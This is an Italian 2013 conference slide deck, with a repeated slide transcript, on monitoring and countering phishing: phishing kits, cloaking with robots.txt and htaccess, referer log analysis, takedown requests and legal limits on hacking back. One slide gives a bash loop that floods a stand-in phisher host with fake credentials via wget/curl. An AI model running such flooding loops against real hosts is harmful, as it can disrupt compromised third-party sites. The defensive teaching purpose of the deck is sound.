ݺߣ

ݺߣShare a Scribd company logo
Phishing:
monitoraggio e contrasto.
I possibili approcci e le reali possibilitA'
Torino 30 maggio 2013
Denis Frati
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 1
Frode utenti Telepass
21-6-2012: 50 cc validi luhn
Frode utenti Poste Pay
14-11-2012: 17 cc validi luhn
Frode utenti PayPal 15-11-2012:
5 cc validi luhn
Frode Agip/Eni 19-11-2012: 17
cc validi luhn
Frode utenti Visa 20-11-2012:
23 cc validi luhn
ecc... ecc... ecc...

Il phishing non e' la truffa degli sciocchi!!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 2

Il phishing non e' solo bancario – 1
(social network)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 2

Il phishing non e' solo bancario – 2
(e-mail account)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 2

Il phishing non e' solo bancario – 2
(On-line game)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… Se ne frega dell'otp

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… Perche' gli bastano le carte di credito - 1

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… Perche' gli bastano le
carte di credito - 2

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

sfatiamo i luoghi comuni - 3

… o l'accesso agli account in cui reperirle

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Generalita'
Il Phishing è:
●
●
●
●

di semplice attuazione;
poco dispendioso;
trans-frontaliero;
a basso rischio;

si avvantaggia di:
●
●
●

Denis Frati – D3Lab
Www.d3lab.net

ampio bacino vittime;
innumerevoli target;
pericolosità sottostimata;
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Di cosa necessita' il phisher ? - 1
- Il kit Kit di phishing:
l'insieme di pagine html/htm,
php ed immagini, riproducenti
quelle dell'ente target.
<--- li fanno e
li vendono

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Di cosa necessita' il phisher ? - 2
- liste di indirizzi mail & mail server Liste di indirizzi email a cui
inviare le mail fraudolente.
Sistema invio mail:
●
●
●
●

Denis Frati – D3Lab
Www.d3lab.net

mail sender php;
server di posta violati;
macchine compromesse;
connessioni wireless
aperta;
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Di cosa necessita' il phisher ? - 3
- SPAZIO di hosting Spazio di hosting:
●
●
●
●

Denis Frati – D3Lab
Www.d3lab.net

gratuito;
a pagamento;
sito violato;
sulla propria macchina +
dns dinamico;
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

FUNZIOnamento base

3

2
1

6

4
5
6

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Previsioni, preveggenza, vaticinio ???

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

monitoraggio
Undergorund & cyber crime intelligence

False pagine web on-line

Attack spread

Provenienza
Profili utente

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
Undergorund & cyber crime intelligence
Tra il dire ed il fare …
sono necessari:
●
●
●
●
●
●
●

struttura;
risorse umane;
tempo
conoscenza degli “ambienti”
storico: profili, attività, partecipazioni, conoscenze
referenze;
ecc;

… non basta iscriversi ad un forum/blog underground,
frequentare saltuariamente un canale irc su un server .ru

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
Presenza false pagine web on-line
●
●

●

●

il phishing è dinamico, veloce!
raramente sono presenti collegamenti a
pagine web indicizzate;
l'indicizzazione è spesso successiva alle prime
segnalazioni di frode;
il phisher conosce benissimo e usa:
➔
➔

robot.txt;
htaccess;

User-agent: *
Disallow: /folder1/
User-Agent: Googlebot
Disallow: /folder2/
RewriteEngine On
...
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^.* - [F,L]

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
ATTACK spread
●

falsificazione degli header della mail

Notifica mancati recapiti ->WARNING
un diluvio di notifiche che può anche mettere
in crisi il web server

Return-Path: <info@mycompany.it>
●

invio massiccio di mail anche a indirizzi
inesistenti

sono necessari:
●
monitoraggio data-base on line;
●
mail box civetta;
●
segnalatori (spesso i clienti verso filiali);
… buongiorno ho visto la mail per il concorso,
quello del bonus per la ricarica

addestrare il personale
a ricevere le segnalazioni

… scusi mi avete scritto per un mio conto ...ma
io non sono vostro cliente ….

Denis Frati – D3Lab
Www.d3lab.net

Scusi?? mi spieghi bene, …
…mi inoltri la mail,
…può inviarmi il sorgente della
mail?
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio
Monitorare la provenienza - 1
188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820
"http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03;
Windows ME) Opera 5.11 [en]"
Source Ip address: 188.216.109.13
Data: [25/May/2013:17:30:46 -0700]
Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1"
Risposta server: 200 6820
Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php"
User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"
from http://httpd.apache.org/docs/2.2/logs.html

la vittima viene rimandata a specifiche pagine legittime;
noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no
*.mycompany.com, ecc..)

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Dal Monitoraggio al contrasto
Attraverso Monitoraggio provenienza
referer pericoloso
su pagina login

azioni di verifica diretta

identifico
cliente

confronto profilo cliente
ulteriori verifiche

rilevo IP possibile
vittima

Frode ?

Y
fatto login ?
N

Y
blocco account
blocco operatività

1- test security company, curiosi, casuale, ecc
2- cliente che non prosegue con login

Denis Frati – D3Lab
Www.d3lab.net

N

Evento >> log.db
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
Richieste shutdown
Eliminare le pagine web fraudolente è imperativo, ma …
… realisticamente i mezzi sono pochi!
Si inoltrano le richieste a:
● gestori siti web;
● gestori server;
● hoster;
● fornitori connettività;
Tuttavia permangono problemi dovuti a:
● orari, fusi orari e festività;
● difficoltà contatto;
● servizi whois privacy;
● incomprensioni linguistiche;
● diffidenza;

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Contrasto - Richieste shutdown – PLAYNG WITH
redirect

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Contrasto - Richieste shutdown
PLAYNG WITH DYNAMIC DNS & fake sub domain
I servizi di DNS dinamico permettono al
criminale di:
● creare domini con nomi ingannevoli;
● mantenere le strutture/pagine web al
sicuro su proprie macchine connesse
in rete via SIM card
● celare la reale posizione delle pagine
- É necessario tracciare gli indirizzi IP
correlati ai domini
- intervenire
•
con corretti titolari degli IP
•
Fornitori servizio Dyn DNS

Il criminale:
● aggredisce il sito A;
● accede al pannello digestione
domini/DNS
● imposta subdomini con wild card;
● aggredisce il sito B
● inocula le pagine fraudolente
● dirotta su di esse i subdomini di A
www.post4.it.sitobucato.com
È necessario intervenire con tutte le
parti:
● gestori dei siti A & B
● hoster dei siti A & B
● fornitori connettività A & B;

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
Credentials bombing
Le credenziali rubate vengono:
● spedite via mail al criminale;
● scritte su file di testo (locali o remoti);
● scritte in db remoti;

Ehi Cattivo?!?! Vuoi le credenziali ???
Eccole!!
A=1
while [ $A -eq 1 ]
do
wget/curl http://attacksite.com/login.php?user&pass&pin
done

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
Credentials search
Se le credenziali sono scritte su file possono
essere individuate !!

Però lo sanno anche loro e
le scrivono in /tmp che
leggono via shell remote

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
kit search
L'individuazione del kit mi consente di
● Sapere dove (presumibilmente) finiscono
le credenziali;
● Profilare il possibile utilizzatore o autore
del kit;
● Conoscere la propria pagina da
monitorare nei log http per i referer non
trusted;
● Conoscere le proprie risorse (immagini,
applet flash, css, ecc...) usate dei
criminali per bloccarle;

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
I WANT TO BE BAD! - 1
Hai trovato una shell remota!!!
Grida di giubilio!!
Puoi entrare e sderenarli!!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
I WANT TO BE BAD! - 2
Ricorda:
vuoi utilizzare exploit e shell remote come il phisher per contrastarlo?
Commetti almeno un reato
Art. 615 ter. C.p.(accesso abusivo a sistem informatico)
se non due
Art. 617 quinquies. C.p. (danneggiamento sistema informatico).
E le responsabilità aziendali ?!?!
Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché
acquisiste in modo illecito!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
I WANT TO BE BAD! - 3
Ricorda:
puoi accedere (illecitamente) allo spazio usato dal criminale,
cancellare i suoi file, le pagine web fraudolente, ma …
… se la vulnerabilità che ha permesso l'accesso al criminale permane..
NON HAI RISOLTO MOLTO.
È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la
porta è ancora aperta!

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Monitoraggio & Analisi a tutto campo
Basi del contrasto
Un monitoraggio ampio e continuo
permette:
● Rilevare cambi di modalità operativa;
● Individuare nuove piattaforme bersaglio
per inoculazione;
● Conoscere nomi dei file di credenziali e
delle shell remote;
● Individuare i kit;
● Riconoscere la “firma” degli autori e
profilarli;
● Individuare nell'analisi attacchi a non
clienti tracce di attacco a clienti;
● Ipotizzare possibili futuri enti bersaglio.

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Previsioni, preveggenza, vaticinio ???
Il monitoraggio a largo raggio fornisce indicazioni
sugli orientamenti dei phisher:
es. agosto 2012 rilavati attacchi a EDF (fornitore
energia francese)
Fine 2012 attacchi a Gruppo, Agip/Eni
es. agosto 2012 attacchi BNP-PARIBAS (DE)
Autunno 2012 attacchi BNP-PARIBAS (IT)
Maggio 2013 attacchi BNP-PARIBAS (ES)
es:fine 2012 attacchi Deteuche Bank IT
1° quadr. 2013 attacchi Deteuche Bank (DE)
Phishing forecast: chi verrà attaccato nei prossimi giorni?
www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

contrasto
formazione
La (in)formazione del cliente può
avere un buon ritorno di immagine, a
costi contenuti.
Gli avvisi sulle pagine web non li
legge nessuno,ancor meno i deplian.
La formazione degli utenti interni, dei
dipendenti, porta solo sicurezza.
Kevin Mitnick parlava di formazione
aziendale a contrasto dall'ingegneria
sociale già nel 2002 (l'arte
dell'inganno).

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

domande

Denis Frati – D3Lab
Www.d3lab.net
Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013

Contatti:
d3lab ~ $ whois denisfrati
Registrant Info:
Registrant: denis frati
Mail address: info@d3lab.net
Company: D3Lab
Address: Ivrea (TO) – V. Jervis, 4
Phone: +39-0125-1963370
Fax: +39-0125-1963371
Compeny web site: www.d3lab.net
Personal web site: www.denisfrati.it
Expires on..............: never
Last modified on........: 2012-02-20

Denis Frati – D3Lab
Www.d3lab.net

More Related Content

Phishing: monitoraggio e contrasto - i possibili approcci e le reali possibilità

  • 1. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' Torino 30 maggio 2013 Denis Frati
  • 2. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 1 Frode utenti Telepass 21-6-2012: 50 cc validi luhn Frode utenti Poste Pay 14-11-2012: 17 cc validi luhn Frode utenti PayPal 15-11-2012: 5 cc validi luhn Frode Agip/Eni 19-11-2012: 17 cc validi luhn Frode utenti Visa 20-11-2012: 23 cc validi luhn ecc... ecc... ecc... Il phishing non e' la truffa degli sciocchi!! Denis Frati – D3Lab Www.d3lab.net
  • 3. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 2 Il phishing non e' solo bancario – 1 (social network) Denis Frati – D3Lab Www.d3lab.net
  • 4. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 2 Il phishing non e' solo bancario – 2 (e-mail account) Denis Frati – D3Lab Www.d3lab.net
  • 5. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 2 Il phishing non e' solo bancario – 2 (On-line game) Denis Frati – D3Lab Www.d3lab.net
  • 6. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … Se ne frega dell'otp Denis Frati – D3Lab Www.d3lab.net
  • 7. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … Perche' gli bastano le carte di credito - 1 Denis Frati – D3Lab Www.d3lab.net
  • 8. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … Perche' gli bastano le carte di credito - 2 Denis Frati – D3Lab Www.d3lab.net
  • 9. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 sfatiamo i luoghi comuni - 3 … o l'accesso agli account in cui reperirle Denis Frati – D3Lab Www.d3lab.net
  • 10. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Generalita' Il Phishing è: ● ● ● ● di semplice attuazione; poco dispendioso; trans-frontaliero; a basso rischio; si avvantaggia di: ● ● ● Denis Frati – D3Lab Www.d3lab.net ampio bacino vittime; innumerevoli target; pericolosità sottostimata;
  • 11. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Di cosa necessita' il phisher ? - 1 - Il kit Kit di phishing: l'insieme di pagine html/htm, php ed immagini, riproducenti quelle dell'ente target. <--- li fanno e li vendono Denis Frati – D3Lab Www.d3lab.net
  • 12. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Di cosa necessita' il phisher ? - 2 - liste di indirizzi mail & mail server Liste di indirizzi email a cui inviare le mail fraudolente. Sistema invio mail: ● ● ● ● Denis Frati – D3Lab Www.d3lab.net mail sender php; server di posta violati; macchine compromesse; connessioni wireless aperta;
  • 13. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Di cosa necessita' il phisher ? - 3 - SPAZIO di hosting Spazio di hosting: ● ● ● ● Denis Frati – D3Lab Www.d3lab.net gratuito; a pagamento; sito violato; sulla propria macchina + dns dinamico;
  • 14. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 FUNZIOnamento base 3 2 1 6 4 5 6 Denis Frati – D3Lab Www.d3lab.net
  • 15. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Previsioni, preveggenza, vaticinio ??? Denis Frati – D3Lab Www.d3lab.net
  • 16. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 monitoraggio Undergorund & cyber crime intelligence False pagine web on-line Attack spread Provenienza Profili utente Denis Frati – D3Lab Www.d3lab.net
  • 17. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio Undergorund & cyber crime intelligence Tra il dire ed il fare … sono necessari: ● ● ● ● ● ● ● struttura; risorse umane; tempo conoscenza degli “ambienti” storico: profili, attività, partecipazioni, conoscenze referenze; ecc; … non basta iscriversi ad un forum/blog underground, frequentare saltuariamente un canale irc su un server .ru Denis Frati – D3Lab Www.d3lab.net
  • 18. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio Presenza false pagine web on-line ● ● ● ● il phishing è dinamico, veloce! raramente sono presenti collegamenti a pagine web indicizzate; l'indicizzazione è spesso successiva alle prime segnalazioni di frode; il phisher conosce benissimo e usa: ➔ ➔ robot.txt; htaccess; User-agent: * Disallow: /folder1/ User-Agent: Googlebot Disallow: /folder2/ RewriteEngine On ... RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Googlebot RewriteRule ^.* - [F,L] Denis Frati – D3Lab Www.d3lab.net
  • 19. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio ATTACK spread ● falsificazione degli header della mail Notifica mancati recapiti ->WARNING un diluvio di notifiche che può anche mettere in crisi il web server Return-Path: <info@mycompany.it> ● invio massiccio di mail anche a indirizzi inesistenti sono necessari: ● monitoraggio data-base on line; ● mail box civetta; ● segnalatori (spesso i clienti verso filiali); … buongiorno ho visto la mail per il concorso, quello del bonus per la ricarica addestrare il personale a ricevere le segnalazioni … scusi mi avete scritto per un mio conto ...ma io non sono vostro cliente …. Denis Frati – D3Lab Www.d3lab.net Scusi?? mi spieghi bene, … …mi inoltri la mail, …può inviarmi il sorgente della mail?
  • 20. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio Monitorare la provenienza - 1 188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820 "http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]" Source Ip address: 188.216.109.13 Data: [25/May/2013:17:30:46 -0700] Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1" Risposta server: 200 6820 Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php" User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]" from http://httpd.apache.org/docs/2.2/logs.html la vittima viene rimandata a specifiche pagine legittime; noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no *.mycompany.com, ecc..) Denis Frati – D3Lab Www.d3lab.net
  • 21. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Dal Monitoraggio al contrasto Attraverso Monitoraggio provenienza referer pericoloso su pagina login azioni di verifica diretta identifico cliente confronto profilo cliente ulteriori verifiche rilevo IP possibile vittima Frode ? Y fatto login ? N Y blocco account blocco operatività 1- test security company, curiosi, casuale, ecc 2- cliente che non prosegue con login Denis Frati – D3Lab Www.d3lab.net N Evento >> log.db
  • 22. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto Richieste shutdown Eliminare le pagine web fraudolente è imperativo, ma … … realisticamente i mezzi sono pochi! Si inoltrano le richieste a: ● gestori siti web; ● gestori server; ● hoster; ● fornitori connettività; Tuttavia permangono problemi dovuti a: ● orari, fusi orari e festività; ● difficoltà contatto; ● servizi whois privacy; ● incomprensioni linguistiche; ● diffidenza; Denis Frati – D3Lab Www.d3lab.net
  • 23. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Contrasto - Richieste shutdown – PLAYNG WITH redirect Denis Frati – D3Lab Www.d3lab.net
  • 24. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Contrasto - Richieste shutdown PLAYNG WITH DYNAMIC DNS & fake sub domain I servizi di DNS dinamico permettono al criminale di: ● creare domini con nomi ingannevoli; ● mantenere le strutture/pagine web al sicuro su proprie macchine connesse in rete via SIM card ● celare la reale posizione delle pagine - É necessario tracciare gli indirizzi IP correlati ai domini - intervenire • con corretti titolari degli IP • Fornitori servizio Dyn DNS Il criminale: ● aggredisce il sito A; ● accede al pannello digestione domini/DNS ● imposta subdomini con wild card; ● aggredisce il sito B ● inocula le pagine fraudolente ● dirotta su di esse i subdomini di A www.post4.it.sitobucato.com È necessario intervenire con tutte le parti: ● gestori dei siti A & B ● hoster dei siti A & B ● fornitori connettività A & B; Denis Frati – D3Lab Www.d3lab.net
  • 25. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto Credentials bombing Le credenziali rubate vengono: ● spedite via mail al criminale; ● scritte su file di testo (locali o remoti); ● scritte in db remoti; Ehi Cattivo?!?! Vuoi le credenziali ??? Eccole!! A=1 while [ $A -eq 1 ] do wget/curl http://attacksite.com/login.php?user&pass&pin done Denis Frati – D3Lab Www.d3lab.net
  • 26. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto Credentials search Se le credenziali sono scritte su file possono essere individuate !! Però lo sanno anche loro e le scrivono in /tmp che leggono via shell remote Denis Frati – D3Lab Www.d3lab.net
  • 27. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto kit search L'individuazione del kit mi consente di ● Sapere dove (presumibilmente) finiscono le credenziali; ● Profilare il possibile utilizzatore o autore del kit; ● Conoscere la propria pagina da monitorare nei log http per i referer non trusted; ● Conoscere le proprie risorse (immagini, applet flash, css, ecc...) usate dei criminali per bloccarle; Denis Frati – D3Lab Www.d3lab.net
  • 28. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto I WANT TO BE BAD! - 1 Hai trovato una shell remota!!! Grida di giubilio!! Puoi entrare e sderenarli!! Denis Frati – D3Lab Www.d3lab.net
  • 29. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto I WANT TO BE BAD! - 2 Ricorda: vuoi utilizzare exploit e shell remote come il phisher per contrastarlo? Commetti almeno un reato Art. 615 ter. C.p.(accesso abusivo a sistem informatico) se non due Art. 617 quinquies. C.p. (danneggiamento sistema informatico). E le responsabilità aziendali ?!?! Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché acquisiste in modo illecito! Denis Frati – D3Lab Www.d3lab.net
  • 30. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto I WANT TO BE BAD! - 3 Ricorda: puoi accedere (illecitamente) allo spazio usato dal criminale, cancellare i suoi file, le pagine web fraudolente, ma … … se la vulnerabilità che ha permesso l'accesso al criminale permane.. NON HAI RISOLTO MOLTO. È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la porta è ancora aperta! Denis Frati – D3Lab Www.d3lab.net
  • 31. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio & Analisi a tutto campo Basi del contrasto Un monitoraggio ampio e continuo permette: ● Rilevare cambi di modalità operativa; ● Individuare nuove piattaforme bersaglio per inoculazione; ● Conoscere nomi dei file di credenziali e delle shell remote; ● Individuare i kit; ● Riconoscere la “firma” degli autori e profilarli; ● Individuare nell'analisi attacchi a non clienti tracce di attacco a clienti; ● Ipotizzare possibili futuri enti bersaglio. Denis Frati – D3Lab Www.d3lab.net
  • 32. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Previsioni, preveggenza, vaticinio ??? Il monitoraggio a largo raggio fornisce indicazioni sugli orientamenti dei phisher: es. agosto 2012 rilavati attacchi a EDF (fornitore energia francese) Fine 2012 attacchi a Gruppo, Agip/Eni es. agosto 2012 attacchi BNP-PARIBAS (DE) Autunno 2012 attacchi BNP-PARIBAS (IT) Maggio 2013 attacchi BNP-PARIBAS (ES) es:fine 2012 attacchi Deteuche Bank IT 1° quadr. 2013 attacchi Deteuche Bank (DE) Phishing forecast: chi verrà attaccato nei prossimi giorni? www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher Denis Frati – D3Lab Www.d3lab.net
  • 33. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto formazione La (in)formazione del cliente può avere un buon ritorno di immagine, a costi contenuti. Gli avvisi sulle pagine web non li legge nessuno,ancor meno i deplian. La formazione degli utenti interni, dei dipendenti, porta solo sicurezza. Kevin Mitnick parlava di formazione aziendale a contrasto dall'ingegneria sociale già nel 2002 (l'arte dell'inganno). Denis Frati – D3Lab Www.d3lab.net
  • 34. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 domande Denis Frati – D3Lab Www.d3lab.net
  • 35. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Contatti: d3lab ~ $ whois denisfrati Registrant Info: Registrant: denis frati Mail address: info@d3lab.net Company: D3Lab Address: Ivrea (TO) – V. Jervis, 4 Phone: +39-0125-1963370 Fax: +39-0125-1963371 Compeny web site: www.d3lab.net Personal web site: www.denisfrati.it Expires on..............: never Last modified on........: 2012-02-20 Denis Frati – D3Lab Www.d3lab.net